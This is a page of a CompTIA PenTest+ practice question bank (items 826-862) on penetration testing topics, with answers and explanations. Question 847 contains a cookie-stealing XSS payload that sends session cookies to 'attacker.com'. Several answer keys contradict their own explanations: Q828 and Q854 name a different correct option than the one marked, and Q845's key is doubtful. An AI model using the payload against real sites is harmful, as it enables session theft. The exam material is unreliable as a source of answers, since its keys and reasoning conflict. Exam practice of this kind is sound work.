CompTIA PenTest+ PT0-002 (PT0-002) — Questions 826900

993 questions total · 14pages · All types, answers revealed

Page 11

Page 12 of 14

Page 13
826
MCQmedium

During a web application test, the tester uses sqlmap and identifies a time-based blind SQL injection. Which technique is sqlmap using to extract data?

A.Error-based SQL injection
B.Boolean-based blind SQL injection
C.UNION-based SQL injection
D.Time-based blind SQL injection
AnswerD

Time-based uses SLEEP or WAITFOR DELAY to extract data.

Why this answer

Time-based blind SQL injection uses conditional delays to infer the truth of queries based on response time.

827
MCQeasy

During a penetration test, the tester identifies a low-risk information disclosure vulnerability in a public-facing web server. The tester includes this finding in the final report. Which component of the risk rating should the tester use to justify the low severity?

A.CVSS base score
B.Exploitability metrics
C.Impact metrics
D.Temporal score
AnswerA

The base score is the standard metric for severity, calculated from exploitability and impact. A low base score justifies the low-risk rating.

Why this answer

The CVSS base score is the correct component to justify the low severity because it represents the intrinsic and fundamental characteristics of a vulnerability that are constant over time and across user environments. In this case, the information disclosure vulnerability has a low base score due to factors such as low attack complexity and low impact on confidentiality, which are captured in the base metrics. The base score is the standard starting point for communicating severity, making it the appropriate justification for the low-risk rating in the report.

Exam trap

CompTIA often tests the misconception that exploitability metrics or impact metrics alone determine the severity, when in fact the CVSS base score is the aggregate of both and is the authoritative component for justifying the risk rating in a report.

How to eliminate wrong answers

Option B is wrong because exploitability metrics (e.g., attack vector, attack complexity, privileges required, user interaction) are sub-components of the CVSS base score that influence the overall severity, but they alone do not define the final risk rating; they must be combined with impact metrics to produce the base score. Option C is wrong because impact metrics (e.g., confidentiality, integrity, availability) are also sub-components of the base score and do not independently justify the low severity; the base score integrates both exploitability and impact. Option D is wrong because the temporal score adjusts the base score based on factors that change over time (e.g., exploit code maturity, remediation level, report confidence), but the question asks for the component to justify the low severity at the time of the test, not a future-adjusted score.

828
MCQhard

A penetration tester is conducting an external assessment against a client's web application hosted on an AWS EC2 instance behind an Application Load Balancer (ALB). The tester has performed passive reconnaissance and identified the public IP of the ALB, but the web application is only accessible via a specific domain name. During active scanning, the tester runs Nmap against the public IP and only sees port 443 open. The tester then performs a DNS Zone Transfer attempt against the authoritative name servers, which fails. While reviewing the web application, the tester notices that the application sets a cookie with the path '/admin'. The tester suspects there is an internal subnet used for backend services. Which of the following techniques would be MOST effective to discover internal hostnames or IP ranges?

A.Attempt a zone transfer against a different authoritative DNS server.
B.Examine SSL certificate Subject Alternative Names (SANs) in the certificate presented by the ALB.
C.Use the AWS Metadata Service to extract information about the underlying EC2 instance.
D.Perform a ping sweep of the internal RFC 1918 addresses and look for responses.
AnswerB

Internal hostnames are often included in SANs for web servers.

Why this answer

Option D is correct because SSL certificates often include Subject Alternative Names (SANs) that list internal hostnames. Option A is impossible from outside the network; Option B requires internal access to the metadata service; Option C already failed.

829
Multi-Selectmedium

A penetration tester is conducting a post-exploitation phase on a Windows target and wants to dump credentials. Which of the following tools can be used? (Choose TWO.)

Select 2 answers
A.secretsdump.py
B.Mimikatz
C.Nmap
D.Hydra
E.Wireshark
AnswersA, B

Secretsdump.py dumps SAM and NTDS.dit hashes.

Why this answer

Mimikatz is a well-known credential dumping tool, and secretsdump.py from Impacket can dump hashes remotely.

830
MCQeasy

In Metasploit, after searching for an exploit, you select it with 'use exploit/...' and set required options. What is the final command to execute the exploit against the target?

A.execute
B.launch
C.start
D.run
AnswerD

'run' or 'exploit' initiates the exploit.

Why this answer

The 'run' or 'exploit' command launches the exploit.

831
MCQeasy

After a penetration test, the client's technical team wants to understand the exact steps required to reproduce a cross-site scripting vulnerability found in the web application. In which section of the standard penetration testing report should this information be included?

A.Executive Summary
B.Technical Findings and Recommendations
C.Methodology
D.Appendices
AnswerB

This section contains detailed technical information for each vulnerability, including the steps to reproduce.

Why this answer

The Technical Findings and Recommendations section is the correct place for step-by-step reproduction steps because it provides detailed, actionable technical information for the client's technical team. This section typically includes specific payloads, HTTP request/response details, and the exact sequence of user interactions needed to trigger the XSS vulnerability, enabling the team to verify and remediate the issue.

Exam trap

The trap here is that candidates confuse the high-level 'Methodology' section (which describes the overall testing process) with the detailed 'Technical Findings' section, mistakenly thinking reproduction steps belong in the methodology rather than the findings.

How to eliminate wrong answers

Option A is wrong because the Executive Summary is a high-level overview for non-technical stakeholders, focusing on business impact and risk ratings, not detailed reproduction steps. Option C is wrong because the Methodology section describes the overall testing approach and tools used (e.g., OWASP ZAP, Burp Suite), not the specific steps for a single vulnerability. Option D is wrong because Appendices contain supplementary material like raw scan outputs or log excerpts, but the primary, structured reproduction steps belong in the main body of the Technical Findings section.

832
MCQmedium

During a penetration test, a tester has access to a Windows domain-joined machine. The tester finds that the machine is running a service that uses named pipes for interprocess communication. The tester wants to perform a relay attack to capture authentication credentials. Which of the following conditions is necessary for an SMB relay attack to succeed?

A.SMB signing must be disabled or not enforced
B.The attacker must be on the same subnet
C.The target must have a publicly available SMB share
D.The attacker must have admin privileges on the relay machine
AnswerA

SMB signing provides integrity and authentication checks; if it is disabled or not enforced, the relayed authentication succeeds because the server does not verify the source of the message.

Why this answer

SMB relay attacks work by intercepting an authentication attempt and forwarding it to a target server. For the relay to succeed, the target server must not require SMB signing, because signing ensures that the relayed authentication packet is cryptographically bound to the original session, preventing the attacker from replaying it. When SMB signing is disabled or not enforced, the relayed authentication is accepted as valid, allowing credential capture.

Exam trap

CompTIA often tests the misconception that SMB relay requires the attacker to be on the same subnet or have admin privileges, but the critical technical condition is the absence of SMB signing enforcement on the target server.

How to eliminate wrong answers

Option B is wrong because SMB relay attacks can be performed across subnets as long as the attacker can route the traffic between the victim and the target server; being on the same subnet is not a requirement. Option C is wrong because the target does not need a publicly available SMB share; the relay works against any SMB server that accepts authentication, even if no shares are accessible. Option D is wrong because the attacker does not need admin privileges on the relay machine; the relay is performed from the attacker's machine or a controlled system, and the attack succeeds based on network position and protocol weaknesses, not local administrative rights.

833
MCQmedium

A penetration tester is using theHarvester tool to gather email addresses and subdomains for a target domain. Which source is theHarvester commonly configured to use for passive reconnaissance?

A.Shodan
B.Google search
C.DNS zone transfer
D.Social media APIs
AnswerB

Google search is a common source for theHarvester to passively collect emails and subdomains.

Why this answer

TheHarvester is a passive reconnaissance tool that collects emails, subdomains, and other data from public sources without directly interacting with the target. Google search is a primary source because theHarvester uses Google's search engine via its API or scraping to find indexed pages containing email addresses and subdomains, leveraging Google's dorking capabilities for passive data gathering.

Exam trap

CompTIA often tests the distinction between passive and active reconnaissance, and the trap here is that candidates confuse Shodan (a passive search engine for devices) with theHarvester's passive email/subdomain gathering, or assume DNS zone transfer is passive when it is an active query that requires direct server interaction.

How to eliminate wrong answers

Option A is wrong because Shodan is a search engine for internet-connected devices and services, used for active or passive scanning of open ports and banners, not for harvesting emails or subdomains from web content. Option C is wrong because DNS zone transfer is an active reconnaissance technique that attempts to retrieve the entire DNS zone file from a nameserver, requiring direct interaction and often failing due to security restrictions, whereas theHarvester focuses on passive methods. Option D is wrong because while social media APIs can provide user data, theHarvester's default configuration does not commonly use them; it primarily relies on search engines like Google, Bing, and Yahoo for passive email and subdomain discovery.

834
MCQhard

A penetration tester is performing passive reconnaissance on a target organization. The tester wants to identify internal IP address ranges used by the organization without interacting directly with their network. Which of the following techniques would be most effective for this purpose?

A.Querying public BGP route databases and looking up the organization's autonomous system (AS) number
B.Performing a DNS zone transfer against the target's authoritative DNS servers
C.Using Shodan to search for devices from the target organization
D.Sending ARP requests on the local network segment to discover hosts
AnswerA

BGP databases contain announced IP prefixes for AS numbers. By finding the target's ASN, the tester can see all public IP ranges associated with the organization.

Why this answer

Querying public BGP route databases (e.g., RADB, ARIN) using the organization's AS number allows a tester to retrieve IP prefixes announced by the target. This is passive reconnaissance because it uses publicly available routing data without sending any packets to the target's network, making it ideal for identifying internal IP ranges from an external perspective.

Exam trap

CompTIA often tests the distinction between passive and active reconnaissance, and the trap here is that candidates confuse DNS zone transfers (which are active and often restricted) with passive DNS lookups, or assume Shodan is always passive when it actually relies on active scanning data from the past.

How to eliminate wrong answers

Option B is wrong because a DNS zone transfer (AXFR) is an active technique that requires direct interaction with the target's authoritative DNS servers; it is not passive and often fails due to security restrictions. Option C is wrong because using Shodan involves querying a search engine that has previously scanned the target's public-facing devices, which is technically passive but relies on historical scan data and may not reveal internal IP ranges not exposed to the internet. Option D is wrong because sending ARP requests is an active, link-local discovery method that requires being on the same broadcast domain as the target, which is not passive and not feasible during external reconnaissance.

835
MCQhard

During a penetration test, a tester gains access to a Linux server as a low-privileged user. The server has a cron job that executes a script owned by root but writable by the tester's group. Which privilege escalation technique should the tester use?

A.Kernel exploit
B.Misconfigured sudo permissions
C.Cron job exploitation via script modification
D.Path hijacking in the cron job
AnswerC

The tester can modify the script that is executed as root by the cron job. When the job runs, the injected code executes with root privileges.

Why this answer

The cron job executes a script owned by root but writable by the tester's group. This means the tester can modify the script's contents. When the cron job runs (as root), the modified script executes with root privileges, allowing the tester to gain a root shell or execute arbitrary commands as root.

This is a classic cron job exploitation via script modification.

Exam trap

The trap here is that candidates may confuse path hijacking (which exploits an unqualified command in the script) with direct script modification (which exploits writable permissions on the script file itself), but the question explicitly states the script is writable, making modification the correct choice.

How to eliminate wrong answers

Option A is wrong because a kernel exploit targets vulnerabilities in the Linux kernel itself, but the scenario describes a misconfigured file permission (writable script) rather than a kernel bug. Option B is wrong because misconfigured sudo permissions would require the tester to have sudo access or a sudoers entry, which is not mentioned; the attack vector here is a writable cron script, not sudo. Option D is wrong because path hijacking in a cron job involves manipulating the PATH environment variable to execute a malicious binary instead of the intended one, but the scenario explicitly states the script itself is writable, so modifying the script directly is the more direct and reliable technique.

836
MCQhard

A penetration tester is analyzing a Python script that imports the 'scapy' library. The script defines a function that sends a series of TCP SYN packets to a target IP and port range, and then waits for SYN-ACK responses. Which attack is the script performing?

A.TCP SYN flood
B.Port scanning
C.ARP poisoning
D.DNS spoofing
AnswerB

The script performs a SYN scan to identify open ports by observing SYN-ACK responses, which is a form of port scanning.

Why this answer

The script sends TCP SYN packets to a range of ports and waits for SYN-ACK responses. This is the classic behavior of a SYN scan, a type of port scanning that identifies open ports by observing which ports respond with a SYN-ACK. The use of Scapy to craft and send these packets confirms the script is performing port scanning, not a denial-of-service attack.

Exam trap

The trap here is confusing a TCP SYN flood (a denial-of-service attack that sends many SYN packets without completing handshakes) with a SYN scan (a reconnaissance technique that sends SYN packets and analyzes responses to identify open ports).

How to eliminate wrong answers

Option A is wrong because a TCP SYN flood aims to overwhelm a target with a high volume of SYN packets, exhausting resources and causing denial of service; the script described waits for SYN-ACK responses, which is not characteristic of a flood attack. Option C is wrong because ARP poisoning involves sending forged ARP replies to associate the attacker's MAC address with the IP of another host on a local network, which is unrelated to sending TCP SYN packets to a range of ports. Option D is wrong because DNS spoofing involves corrupting DNS responses to redirect traffic to malicious sites, which does not involve sending TCP SYN packets to a target IP and port range.

837
MCQmedium

A penetration tester needs to perform a dictionary attack against an SSH service. Which of the following tools is best suited for this task?

A.CrackMapExec
B.John the Ripper
C.Hashcat
D.Hydra
AnswerD

Correct. Hydra performs online brute-force attacks against services.

Why this answer

Hydra is a versatile online brute-force tool that supports many protocols, including SSH.

838
MCQmedium

A penetration tester has obtained the NTLM hash of a local administrator account on a Windows domain-joined system. The tester wants to use this hash to authenticate to another system on the network and execute commands remotely. Which tool is commonly used for pass-the-hash attacks to achieve remote code execution?

A.Hydra
B.Impacket's wmiexec.py
C.PsExec
D.Sqlmap
AnswerB

wmiexec.py authenticates via WMI using an NTLM hash, enabling remote command execution.

Why this answer

Impacket's wmiexec.py is the correct tool because it directly supports pass-the-hash (PtH) authentication using NTLM hashes over Windows Management Instrumentation (WMI). It accepts an NTLM hash via the `-hashes` flag and establishes a remote WMI session, enabling command execution without needing the plaintext password. This makes it ideal for lateral movement in a domain environment where a local administrator hash has been captured.

Exam trap

CompTIA often tests the distinction between tools that require plaintext credentials versus those that can operate directly with NTLM hashes, leading candidates to mistakenly choose PsExec because it is a well-known remote execution tool, even though it does not natively support pass-the-hash without additional credential injection steps.

How to eliminate wrong answers

Option A (Hydra) is wrong because it is a network login cracker that performs brute-force or dictionary attacks against authentication services, not a pass-the-hash tool; it requires plaintext passwords, not NTLM hashes. Option C (PsExec) is wrong because while it can execute commands remotely, it does not natively support pass-the-hash; it requires a plaintext password or a valid Kerberos ticket, and using an NTLM hash directly would require additional tools like Mimikatz to inject the hash into the session. Option D (Sqlmap) is wrong because it is a SQL injection exploitation tool, completely unrelated to Windows authentication or remote command execution via NTLM hashes.

839
MCQhard

A vulnerability scanner reports a reflected XSS vulnerability in a web application. Manual testing confirms that the application HTML-encodes all user input in the response. Which scanner misconfiguration is MOST likely causing this false positive?

A.The scanner used a POST request instead of a GET request for the payload
B.The scanner's payload was reflected in a different context not subject to HTML encoding
C.The scanner used a payload with special characters that were truncated by the server
D.The scanner's payload triggered a server error that echoed back the input without encoding
AnswerD

Error messages may reflect input without encoding, leading the scanner to flag a false XSS finding.

Why this answer

Option D is correct because a server error that echoes back the unencoded input bypasses the application's normal HTML-encoding logic. In this scenario, the vulnerability scanner detects the reflected payload in the error response, which is not subject to the same encoding as the application's standard output. This creates a false positive because the reflected XSS is not exploitable through the normal application flow, but only through an error condition that the scanner inadvertently triggered.

Exam trap

CompTIA often tests the distinction between a vulnerability being present in an error response versus the normal application flow, tricking candidates into thinking any reflection of input confirms XSS without considering the response context.

How to eliminate wrong answers

Option A is wrong because the HTTP method (POST vs GET) does not affect whether input is HTML-encoded in the response; encoding is applied server-side regardless of the request method. Option B is wrong because if the payload were reflected in a different context not subject to HTML encoding, the finding would be a true positive, not a false positive. Option C is wrong because truncation of special characters would likely prevent the payload from being reflected at all, or would break the XSS vector, leading to a false negative rather than a false positive.

840
MCQmedium

A penetration tester is conducting active reconnaissance on a target network and wants to perform a SYN scan to identify open ports without completing the full TCP handshake. Which Nmap flag should the tester use?

A.-sS
B.-sA
C.-sU
D.-sT
AnswerA

-sS performs a SYN scan, sending SYN packets and analyzing responses.

Why this answer

The -sS flag specifies a SYN scan, which is stealthy and does not complete the three-way handshake.

841
Multi-Selectmedium

A penetration tester is reviewing a Java application for insecure deserialization vulnerabilities. Which of the following should the tester look for? (Choose TWO.)

Select 2 answers
A.Accepting serialized objects from user input without sanitization
B.Use of eval() functions
C.Hardcoded credentials in configuration files
D.Use of prepared statements for SQL queries
E.Use of ObjectInputStream without validation
AnswersA, E

Untrusted input can lead to deserialization attacks.

Why this answer

Insecure deserialization vulnerabilities often arise from using ObjectInputStream without filtering and from accepting serialized data from untrusted sources.

842
MCQhard

During an internal penetration test, a tester compromises a server that is part of a Kubernetes cluster. The tester has access to the node's operating system but not to the cluster's administrative credentials. Which of the following techniques would most likely allow the tester to escalate privileges to cluster-admin or access sensitive resources within the cluster?

A.Extracting a service account token from a running container and using it to access the Kubernetes API
B.Exploiting a kernel vulnerability on the node to escape to the host and then compromise the Kubernetes API server
C.Searching for a kubeconfig file on the node that contains a cluster-admin token
D.Modifying a ConfigMap to inject a malicious pod that runs with elevated privileges
AnswerA

Service account tokens are mounted inside pods. By entering a container (e.g., via the container runtime), the tester can read the token and authenticate to the API server, potentially with elevated rights.

Why this answer

Option A is correct because service account tokens are automatically mounted into pods at /var/run/secrets/kubernetes.io/serviceaccount/token. An attacker with node-level access can extract this token from a running container's filesystem and use it to authenticate to the Kubernetes API server. Since service accounts are often granted broad permissions via RBAC bindings, this token may allow the tester to access sensitive resources or even escalate to cluster-admin if the service account has such privileges.

Exam trap

The trap here is that candidates may assume kernel exploits (Option B) are always the best escalation path, but in Kubernetes, the service account token is a simpler and more direct method to access the API server from a compromised node.

How to eliminate wrong answers

Option B is wrong because exploiting a kernel vulnerability to escape to the host is unnecessary—the tester already has node-level OS access. Even after escaping, compromising the API server would require network access and authentication, which is not directly achieved by a kernel exploit. Option C is wrong because kubeconfig files on a node typically contain only node-level credentials (e.g., kubelet client certificates), not cluster-admin tokens; cluster-admin tokens are rarely stored on worker nodes.

Option D is wrong because modifying a ConfigMap cannot directly inject a pod; ConfigMaps store configuration data, not pod definitions. To create a malicious pod, the tester would need API server access, which is the goal, not the method.

843
MCQhard

During an internal penetration test, a tester gains access to a domain-joined Windows 10 workstation as a local administrator. The tester wants to escalate privileges to Domain Admin. Which attack involves requesting Kerberos service tickets that can be cracked offline to reveal the plaintext password of a service account?

A.Pass-the-hash
B.Kerberoasting
C.Golden ticket
D.Silver ticket
AnswerB

This attack requests and cracks Kerberos service tickets to obtain service account passwords.

Why this answer

Kerberoasting is the correct attack because it involves requesting Kerberos service tickets (TGS-REP) for service accounts registered with Service Principal Names (SPNs) in Active Directory. These tickets are encrypted with the service account's NTLM hash, which can be cracked offline to reveal the plaintext password. Since the tester has local administrator access on a domain-joined workstation, they can use tools like Rubeus or Impacket to request these tickets without needing domain admin privileges initially.

Exam trap

CompTIA often tests Kerberoasting by contrasting it with pass-the-hash, where candidates mistakenly think pass-the-hash involves cracking hashes offline, but it actually reuses the hash directly for authentication without offline cracking.

How to eliminate wrong answers

Option A (Pass-the-hash) is wrong because it reuses an NTLM hash to authenticate without cracking it, not requesting Kerberos service tickets for offline cracking. Option C (Golden ticket) is wrong because it forges a Kerberos Ticket Granting Ticket (TGT) using the KRBTGT account hash, not requesting service tickets for offline cracking. Option D (Silver ticket) is wrong because it forges a service ticket for a specific service using the service account's hash, not requesting and cracking tickets offline.

844
Multi-Selectmedium

A penetration tester is performing initial reconnaissance on a target domain. Which THREE sources can provide historical data about the target? (Select THREE.)

Select 3 answers
A.Wayback Machine
B.Pastebin
C.Shodan
D.Certificate Transparency logs (crt.sh)
E.Nmap
AnswersA, B, D

Wayback Machine archives historical snapshots of websites.

Why this answer

The Wayback Machine archives web pages, Pastebin may contain leaked historical data, and certificate transparency logs (crt.sh) provide historical certificate issuance data.

845
Multi-Selectmedium

A penetration tester is tasked with performing a DNS enumeration of a target domain to discover subdomains. Which THREE tools are commonly used for subdomain bruteforcing? (Select THREE.)

Select 3 answers
A.amass
B.subfinder
C.dnsx
D.sublist3r
E.gobuster dns
AnswersA, B, C

Correct. Amass performs subdomain enumeration using various techniques.

Why this answer

Amass is correct because it is a dedicated subdomain enumeration tool that performs bruteforcing via DNS queries, using wordlists and recursive resolution to discover subdomains. It integrates with multiple data sources and supports active bruteforcing techniques against target domains.

Exam trap

The trap here is that candidates may confuse passive enumeration tools like sublist3r with active bruteforcing tools, or misidentify the correct tool name format (e.g., 'gobuster dns' vs. 'gobuster' with the dns subcommand).

846
MCQmedium

A penetration tester is scoping a test for a multinational corporation that has offices in the United States and the European Union. The client wants to test the entire environment. Which of the following is the MOST important legal consideration for the tester to include in the rules of engagement?

A.Ensuring all testing is performed from a single external IP address
B.Obtaining explicit written authorization from each country's legal department
C.Ensuring compliance with GDPR and data protection laws
D.Restricting testing to non-business hours to minimize impact
AnswerC

GDPR imposes strict rules on handling personal data; the test must be scoped to avoid violations.

Why this answer

Option C is correct because the multinational corporation operates in the European Union, where the General Data Protection Regulation (GDPR) imposes strict requirements on the processing and transfer of personal data. A penetration test that accesses or stores EU residents' personal data must comply with GDPR, including data minimization, lawful processing, and breach notification obligations. Failure to include GDPR compliance in the rules of engagement could result in severe fines (up to 4% of annual global turnover) and legal liability for the tester and client.

Exam trap

The trap here is that candidates often focus on technical constraints like IP whitelisting or broad authorization, overlooking that GDPR compliance is a mandatory legal requirement that overrides all other considerations when testing in or involving EU data subjects.

How to eliminate wrong answers

Option A is wrong because testing from a single external IP address is a technical constraint that might be used for firewall whitelisting or attribution, but it is not a legal consideration; it does not address cross-border data transfer laws, privacy regulations, or jurisdictional consent requirements. Option B is wrong because obtaining explicit written authorization from each country's legal department is impractical and not the most important legal consideration; while authorization is necessary, the primary legal risk in an EU context is GDPR compliance, which governs how personal data is handled during the test, not just permission to test.

847
MCQmedium

While performing a web application penetration test, a tester observes that the application reflects user input in the page without proper sanitization. To steal session cookies, the tester crafts a payload like <script>document.location='http://attacker.com/?cookie='+document.cookie</script>. Which XSS type is this?

A.Stored XSS
B.Reflected XSS
C.DOM-based XSS
D.SQL injection
AnswerB

Reflected XSS is injected and reflected immediately in the response.

Why this answer

Reflected XSS occurs when the injected script is reflected off the web server immediately.

848
Multi-Selectmedium

Which TWO of the following are common techniques used during a pass-the-hash attack? (Select TWO.)

Select 2 answers
A.Extracting NTLM hashes from LSASS
B.Performing a brute-force attack on the hash
C.Using a password spray attack
D.Injecting hashes into a process to authenticate
E.Requesting Kerberos TGS tickets
AnswersA, D

LSASS stores NTLM hashes in memory; extracting them enables PtH.

Why this answer

Option A is correct because in a pass-the-hash attack, the attacker first extracts NTLM hashes from the Local Security Authority Subsystem Service (LSASS) process memory. LSASS stores user credentials, including NTLM hashes, after successful authentication. By dumping LSASS (e.g., using Mimikatz sekurlsa::logonpasswords), the attacker obtains the hash without needing the plaintext password.

Exam trap

CompTIA often tests the distinction between pass-the-hash and hash cracking: candidates mistakenly think brute-forcing the hash (Option B) is part of the attack, but pass-the-hash reuses the hash as-is, never attempting to reverse it.

849
MCQeasy

A penetration tester needs to gather information about a target organization's employees and email addresses from public sources. Which passive reconnaissance tool is BEST suited for this task?

A.Nikto
B.Nmap
C.Wireshark
D.Maltego
AnswerD

Maltego excels at OSINT gathering, including email addresses and employee information.

Why this answer

Maltego is a passive reconnaissance tool that excels at gathering information from public sources, including employee names, email addresses, and organizational relationships, by querying open-source intelligence (OSINT) data such as social media, search engines, and DNS records. It uses transforms to automate data collection and link analysis, making it ideal for this task without directly interacting with the target's systems.

Exam trap

The trap here is that candidates often confuse active scanning tools (like Nikto or Nmap) with passive reconnaissance, failing to recognize that Maltego is specifically designed for OSINT gathering from public sources without sending probes to the target.

How to eliminate wrong answers

Option A is wrong because Nikto is an active web server scanner that sends HTTP requests to identify vulnerabilities, not a passive tool for gathering employee or email data from public sources. Option B is wrong because Nmap is an active network scanning tool that sends packets to discover hosts and services, which is not passive and does not collect employee or email information. Option C is wrong because Wireshark is a network protocol analyzer that captures and inspects live traffic, requiring active packet capture and not suitable for passive OSINT gathering from public sources.

850
MCQmedium

During a web application test, a penetration tester discovers that the server returns verbose error messages containing full file paths. Which type of attack is directly facilitated by this information disclosure?

A.Path traversal
B.SQL injection
C.CSRF
D.Cross-site scripting
AnswerA

Disclosed file paths allow an attacker to construct traversal payloads to access arbitrary files.

Why this answer

Verbose error messages revealing file paths can enable path traversal attacks, as the attacker learns the directory structure. SQL injection may be facilitated by database error messages, but file paths are specific to path traversal.

851
Multi-Selectmedium

A penetration tester wants to pivot from a compromised Linux host to attack internal network resources that are not directly accessible. Which THREE tools or techniques can be used for pivoting?

Select 3 answers
A.psexec
B.Metasploit route command
C.chisel
D.SSH local port forwarding (-L)
E.Windows Remote Desktop (RDP)
AnswersB, C, D

Metasploit route adds routes through a compromised host to pivot.

Why this answer

SSH port forwarding (local, remote, dynamic) and tools like chisel and ligolo-ng are commonly used for pivoting in Linux environments.

852
MCQhard

A tester is exploiting a Linux system and finds a binary with the SUID bit set owned by root. The binary executes other commands. Which technique would allow privilege escalation to root?

A.DLL hijacking
B.Kernel exploit
C.Token impersonation
D.PATH manipulation
AnswerD

Correct: If the SUID binary runs a command using a relative path, PATH manipulation can hijack it to run as root.

Why this answer

If a SUID binary executes commands (e.g., via system() or exec()), it may be exploited to run arbitrary commands as root, especially if the path is not absolute.

853
MCQhard

During a Windows privilege escalation attempt, a tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool can be used to exploit this privilege to gain SYSTEM access?

A.PrintSpoofer
B.PowerUp
C.CrackMapExec
D.Mimikatz
AnswerA

PrintSpoofer leverages SeImpersonatePrivilege to get SYSTEM.

Why this answer

PrintSpoofer exploits SeImpersonatePrivilege to escalate to SYSTEM.

854
MCQmedium

During a penetration test, the tester discovers that a third-party vendor has remote access to the client's network. The vendor was not mentioned in the scope of work. How should the tester communicate this finding in the report?

A.Ignore it entirely because it is outside the testing agreement.
B.Document it in the 'Observations' or 'Out-of-Scope Findings' section.
C.Include it as a critical vulnerability in the main findings.
D.Remove the finding because it is out of scope.
AnswerB

This allows the client to be aware without implying it was a tested vulnerability.

Why this answer

Option C is correct because the finding should be documented as an observation because it is relevant to the overall security posture but may be out of scope. Option A is wrong because it unnecessarily delays reporting. Option B is wrong because ignoring it could miss an important risk.

Option D is wrong because it is not a confirmed vulnerability but an observation.

855
Multi-Selectmedium

During a Windows privilege escalation attempt, the tester finds that the current user has SeImpersonatePrivilege enabled. Which THREE tools or techniques can be used to exploit this privilege?

Select 3 answers
A.JuicyPotato
B.Mimikatz
C.RoguePotato
D.PrintSpoofer
E.PowerUp
AnswersA, C, D

Another potato variant for the same privilege.

Why this answer

PrintSpoofer, RoguePotato, and JuicyPotato exploit SeImpersonatePrivilege to gain SYSTEM. Mimikatz is for credential dumping, and PowerUp is a PowerShell script for privilege escalation but not specific to this privilege.

856
MCQmedium

A penetration tester has completed an engagement and needs to present findings to a mixed audience of technical engineers and business executives. Which section of the penetration test report is BEST suited for communicating high-level risk ratings and potential business impact to the non-technical stakeholders?

A.Executive Summary
B.Technical Findings and Vulnerability Details
C.Remediation Steps
D.Appendix
AnswerA

The executive summary is designed for non-technical audiences and provides a high-level overview of findings, risk ratings, and business impact.

Why this answer

The Executive Summary is the correct section because it is specifically designed to communicate high-level risk ratings, business impact, and strategic recommendations to non-technical stakeholders such as executives. It avoids technical jargon and focuses on the business context, aligning with the PT0-002 objective of tailoring reports to the audience.

Exam trap

CompTIA often tests the candidate's ability to distinguish between audience-appropriate report sections, and the trap here is assuming that 'Technical Findings' is the most important section for all stakeholders, when in fact the Executive Summary is the primary communication tool for non-technical decision-makers.

How to eliminate wrong answers

Option B is wrong because Technical Findings and Vulnerability Details contains in-depth technical descriptions, CVSS scores, proof-of-concept code, and exploit paths that are intended for engineers, not for executives who need a high-level overview. Option C is wrong because Remediation Steps provides specific technical fixes (e.g., patch versions, configuration changes) that require technical understanding to implement, and it does not prioritize business impact or risk ratings for non-technical readers.

857
MCQeasy

A penetration tester wants to discover subdomains of a target domain without sending any packets directly to the target's network. Which resource is most effective for this purpose?

A.DNS brute force with a wordlist
B.Certificate Transparency logs
C.WHOIS lookup
D.Traceroute
AnswerB

These logs contain issued certificates which include subdomains; they can be queried passively.

Why this answer

Certificate Transparency (CT) logs are publicly accessible, append-only ledgers that record every SSL/TLS certificate issued by a Certificate Authority (CA). Since certificates often include Subject Alternative Names (SANs) listing subdomains, querying CT logs (e.g., via crt.sh or tools like `certigo`) reveals subdomains without any direct network probes. This makes CT logs the most effective passive reconnaissance resource, as no packets are sent to the target's infrastructure.

Exam trap

CompTIA often tests the distinction between active and passive reconnaissance; the trap here is assuming DNS brute force is passive because it uses a wordlist, but it actively queries DNS servers, whereas CT logs are truly passive as they rely on publicly archived certificate data.

How to eliminate wrong answers

Option A is wrong because DNS brute force with a wordlist requires sending DNS queries to the target's authoritative name servers, which generates network traffic and directly interacts with the target's infrastructure, violating the 'no packets sent' constraint. Option C is wrong because WHOIS lookup provides registration details (e.g., registrar, admin contacts) for the domain itself, not subdomains; it relies on WHOIS servers and does not enumerate subdomains from certificate data.

858
MCQmedium

During a penetration test, a tester needs to perform a man-in-the-middle (MITM) attack on a local network to capture credentials. Which tool should the tester use to ARP spoof and intercept traffic?

A.Wireshark
B.Nmap
C.TCPDump
D.Ettercap
AnswerD

Ettercap is designed for MITM attacks including ARP poisoning.

Why this answer

Ettercap is a comprehensive MITM tool that supports ARP spoofing, sniffing, and injection. Wireshark is for packet analysis, not active spoofing. TCPDump is for packet capture only.

Nmap can be used for discovery but not MITM.

859
MCQeasy

Which of the following is a common community string used in SNMP enumeration?

A.root
B.snmp
C.public
D.admin
AnswerC

Public is the default read-only community string in many SNMP implementations.

Why this answer

The default community strings for SNMP are often 'public' for read-only and 'private' for read-write access.

860
MCQmedium

During a web application test, you discover an endpoint that accepts a URL parameter and fetches the content. You try `http://169.254.169.254/latest/meta-data/` and receive a response. Which vulnerability is this?

A.Cross-Site Request Forgery (CSRF)
B.Local File Inclusion (LFI)
C.Server-Side Request Forgery (SSRF)
D.XML External Entity (XXE)
AnswerC

SSRF allows the server to make requests to internal/cloud resources.

Why this answer

The IP 169.254.169.254 is the cloud metadata endpoint; accessing it indicates SSRF.

861
MCQhard

A penetration tester has compromised a Windows domain-joined workstation and needs to identify all domain controllers and their IP addresses without triggering detection mechanisms. Which technique is most likely to avoid raising alerts?

A.Perform an LDAP query using ADSI to enumerate domain controllers
B.Attempt a DNS zone transfer from the internal DNS server
C.Perform an ARP scan of the subnet to identify active IP addresses
D.Use Nmap to perform a SYN scan of the entire subnet looking for Kerberos service ports
AnswerA

LDAP queries are common and legitimate domain activity, making them stealthy for internal reconnaissance.

Why this answer

Performing an LDAP query using ADSI to enumerate domain controllers is stealthy because it uses standard, authenticated Windows API calls that blend into normal domain traffic. This technique queries the directory service for the 'domainController' object class, which returns the DNS hostnames and IP addresses without generating suspicious network scans or DNS anomalies.

Exam trap

The trap here is that candidates often assume DNS zone transfers are the standard way to enumerate domain controllers, but they fail to recognize that zone transfers are typically restricted and logged, whereas LDAP queries are routine and less likely to trigger alerts.

How to eliminate wrong answers

Option B is wrong because attempting a DNS zone transfer from the internal DNS server typically requires an 'allow-transfer' ACL and generates a distinct AXFR query that is often logged and monitored by security teams, raising alerts. Option C is wrong because performing an ARP scan of the subnet sends a burst of broadcast requests that can be detected by network intrusion detection systems (NIDS) or endpoint protection platforms (EPP) as reconnaissance activity.

862
MCQmedium

A penetration tester is reviewing a Python script that uses the 'mitmproxy' library. The script sets up a proxy and captures HTTP traffic, then modifies certain requests in real time. Which of the following is the most likely purpose of this script?

A.To perform passive network mapping and port scanning
B.To intercept and manipulate API requests for security testing
C.To capture raw network packets for offline analysis
